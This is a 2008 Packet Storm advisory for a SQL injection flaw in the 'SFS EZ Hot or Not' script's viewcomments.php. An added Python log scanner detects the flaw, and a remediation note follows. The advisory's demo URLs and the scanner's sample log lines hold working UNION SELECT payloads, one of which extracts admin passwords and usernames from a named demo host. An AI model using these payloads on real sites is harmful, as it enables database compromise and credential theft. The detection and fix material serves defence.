sfshotornot-sql.txt

2008-11-01T00:00:00
ID PACKETSTORM:71442
Type packetstorm
Reporter d3b4g
Modified 2008-11-01T00:00:00

Description

                                        
SFS EZ Hot or Not [viewcomments.php?phid] Remote SQL Injection Vulnerability
===============================================================  
  
  
----------------------------------------------------------------  
script : SFS EZ Hot or Not
  
script : http://www.scripts-for-sites.info  
  
Risk : High  
  
----------------------------------------------------------------  
  
Discovered by : d3b4g  
  
email : bl4ckend[at]gmail[dot]com  
  
Site : www.bl4ck3nd.info
  
----------------------------------------------------------------  
Exploit demo: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin/*  
  
  
version: http://www.turnkeyzone.com/demos/hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/*
----------------------------------------------------------------  
  
  
----------------------------------------------------------------  
Greetz: str0ke, Hotlism.org, All my friends
  
-----------------------------------------------------------------  
Proud to be a Maldivian :))
=======================  
  
----------------------------------------------------------------  
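
Detection sketch for the phid parameter described above. This is an added example, not part of the original advisory or the vendor's code: it scans web access logs for viewcomments.php requests whose phid value is not a plain integer. Assumptions: Combined Log Format, legitimate phid values are decimal integers, and the names scan, REQUEST and SAMPLE_LOG are hypothetical; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses and timestamps are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Nov/2008:10:00:01 +0000] "GET /hot/viewcomments.php?phid=42 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Nov/2008:10:00:05 +0000] "GET /hot/viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6/* HTTP/1.1" 200 733
198.51.100.9 - - [01/Nov/2008:10:00:09 +0000] "GET /hot/viewcomments.php?phid=-1%20UNION%20ALL%20SELECT%201,concat(password,username),3,4,5,6%20from%20admin/* HTTP/1.1" 200 801
203.0.113.4 - - [01/Nov/2008:10:01:00 +0000] "GET /hot/viewcomments.php?phid=7%27 HTTP/1.1" 500 120
203.0.113.4 - - [01/Nov/2008:10:01:02 +0000] "GET /hot/index.php?page=2 HTTP/1.1" 200 900
"""

# Client address and request target from one Combined Log Format line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# UNION ... SELECT in any case, with anything (spaces, comments) in between.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def scan(log_text, page="viewcomments.php", param="phid"):
    """Return (client, kind, decoded_value) for every suspicious phid value."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + page):
            continue
        # parse_qs undoes both '+' and %XX encoding, so encoded variants match too.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # the only shape assumed to be legitimate
            kind = "union-select" if UNION_SELECT.search(value) else "non-numeric"
            findings.append((client, kind, value))
    return findings


if __name__ == "__main__":
    for client, kind, value in scan(SAMPLE_LOG):
        print(f"{client}\t{kind}\t{value!r}")
```

The same integer-only rule is the fix on the application side: cast or validate phid as an integer and bind it as a query parameter instead of concatenating it into the SQL string.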
  